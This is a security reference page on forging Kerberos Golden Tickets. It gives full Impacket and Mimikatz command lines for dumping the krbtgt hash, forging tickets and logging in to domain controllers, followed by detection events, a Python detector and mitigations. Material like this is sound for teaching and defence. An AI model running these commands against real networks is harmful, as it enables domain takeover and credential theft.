Golden Ticket
Overview
A Golden Ticket is a forged Kerberos TGT (Ticket Granting Ticket) created using the krbtgt account's password hash. Since the KDC uses the krbtgt hash to sign all TGTs, possessing this hash allows forging a TGT for any user — including non-existent users — with any group membership. Golden Tickets provide domain-level persistence and survive password resets for all accounts except krbtgt itself.
ATT&CK Mapping
- Tactic: TA0006 - Credential Access
- Technique: T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket
Prerequisites
- The `krbtgt` account's NTLM hash or AES key (obtained via DCSync or NTDS.dit extraction)
- Domain SID
- Domain name
Techniques
Obtain krbtgt Hash
```bash
# Impacket — DCSync to extract krbtgt hash
# https://github.com/fortra/impacket
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc-user 'krbtgt'
# With NTLM hash
impacket-secretsdump '<domain>/<admin>@<dc_ip>' -hashes ':<ntlm_hash>' -just-dc-user 'krbtgt'
```
```
# Mimikatz — DCSync
# https://github.com/gentilkiwi/mimikatz
mimikatz# lsadump::dcsync /domain:<domain> /user:krbtgt
```
Get Domain SID
```bash
# Impacket
# https://github.com/fortra/impacket
impacket-lookupsid '<domain>/<user>:<password>@<dc_ip>' 0
# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc ldap <dc_ip> -u <user> -p <password> --get-sid
```
```powershell
# PowerShell
(Get-ADDomain).DomainSID.Value
```
Forge Golden Ticket (Impacket)
```bash
# Impacket — create golden ticket
# https://github.com/fortra/impacket
impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain> Administrator
# With AES key (stealthier — avoids RC4 downgrade detection)
impacket-ticketer -aesKey <krbtgt_aes256_key> -domain-sid <domain_sid> -domain <domain> Administrator
```
This creates Administrator.ccache. Use it:
```bash
export KRB5CCNAME=Administrator.ccache
# Impacket
# https://github.com/fortra/impacket
impacket-psexec '<domain>/Administrator@<dc_hostname>' -k -no-pass
impacket-secretsdump '<domain>/Administrator@<dc_hostname>' -k -no-pass
```
Forge Golden Ticket (Mimikatz)
```
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# Create golden ticket and inject into memory
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_ntlm_hash> /ptt
# Create golden ticket and save to file
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_ntlm_hash> /ticket:golden.kirbi
# With AES key
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /ptt
```
After /ptt (pass-the-ticket), use standard tools:
```
dir \\dc\c$
PsExec.exe \\dc cmd.exe
```
Golden Ticket Characteristics
- Default forged lifetime: 10 years (Mimikatz default when `/endin` is not specified; legitimate Windows TGT default is 10 hours)
- Can impersonate any user including non-existent ones (PAC validation improvements since the November 2021 patch cycle have reduced this on fully patched DCs)
- Survives all password resets except a `krbtgt` password change
- Works across the entire domain
- Group memberships in the ticket are not validated against AD (PAC validation improvements since November 2021 may detect forged PACs on patched DCs)
Detection Methods
Network-Based Detection
- TGS requests without a corresponding TGT request (AS-REQ) to the KDC
- Kerberos tickets with unusually long lifetimes
- Tickets with RC4 encryption in environments that use AES
Host-Based Detection
- Windows Security Event 4769 with ticket encryption type 0x17 (RC4) when AES is the norm
- Event 4624 (logon) for accounts that don't match expected patterns
- Mimikatz execution artifacts
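The two detection signals above (a 4769 with RC4 encryption in an AES domain, and a TGS request with no preceding AS-REQ/4768 for the same account) as an added example of detection logic run over constructed sample events; this is not code from the original page, and the simplified event tuples, field layout and 10-hour lookback are assumptions:

```python
"""Flag Golden Ticket indicators in a stream of Windows Security events.
Indicator 1: Event 4769 (TGS request) with encryption type 0x17/0x18 (RC4)
             in a domain where AES is the baseline.
Indicator 2: Event 4769 for an account with no Event 4768 (TGT issued) in
             the lookback window, i.e. a service ticket obtained with a TGT
             the KDC never issued.
Sample events are constructed for illustration (simplified field layout)."""
from datetime import datetime, timedelta

# Constructed samples: (timestamp, event_id, account, ticket_encryption_type)
SAMPLE_EVENTS = [
    ("2024-05-01T08:00:00", 4768, "alice", 0x12),          # AES256 TGT issued to alice
    ("2024-05-01T08:00:05", 4769, "alice", 0x12),          # AES TGS request: normal
    ("2024-05-01T09:30:00", 4769, "Administrator", 0x17),  # RC4 TGS, no 4768 at all
    ("2024-05-01T09:31:00", 4769, "ghostuser", 0x12),      # AES, but never got a TGT
]

RC4_ETYPES = {0x17, 0x18}  # RC4-HMAC, RC4-HMAC-EXP

def detect_golden_ticket_indicators(events, lookback=timedelta(hours=10), aes_baseline=True):
    """Return a list of (account, reason) alerts for the given events.
    lookback defaults to the 10-hour legitimate TGT lifetime; a longer-lived TGT
    (renewal) or a 4768 logged on another DC needs centralized logs to avoid
    false positives on indicator 2."""
    alerts = []
    tgt_issued = {}  # account (lowercased) -> list of 4768 timestamps
    for ts, event_id, account, etype in sorted(events, key=lambda e: e[0]):
        t = datetime.fromisoformat(ts)
        key = account.lower()
        if event_id == 4768:
            tgt_issued.setdefault(key, []).append(t)
            continue
        if event_id != 4769:
            continue
        if aes_baseline and etype in RC4_ETYPES:
            alerts.append((account, "rc4_tgs_in_aes_domain"))
        recent = [a for a in tgt_issued.get(key, []) if t - lookback <= a <= t]
        if not recent:
            alerts.append((account, "tgs_without_preceding_as_req"))
    return alerts

if __name__ == "__main__":
    for account, reason in detect_golden_ticket_indicators(SAMPLE_EVENTS):
        print(f"ALERT {reason}: {account}")
```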
Mitigation Strategies
- Reset krbtgt password twice — invalidates all existing TGTs (must be done twice because AD keeps the current and previous hash)
- Monitor krbtgt usage — alert on DCSync attempts targeting the krbtgt account
- AES-only Kerberos — disable RC4 to detect RC4-based golden tickets
- Short TGT lifetimes — default is 10 hours; shorter lifetimes reduce the window but don't prevent forged tickets
- Protected Users group — prevents certain delegation and forces AES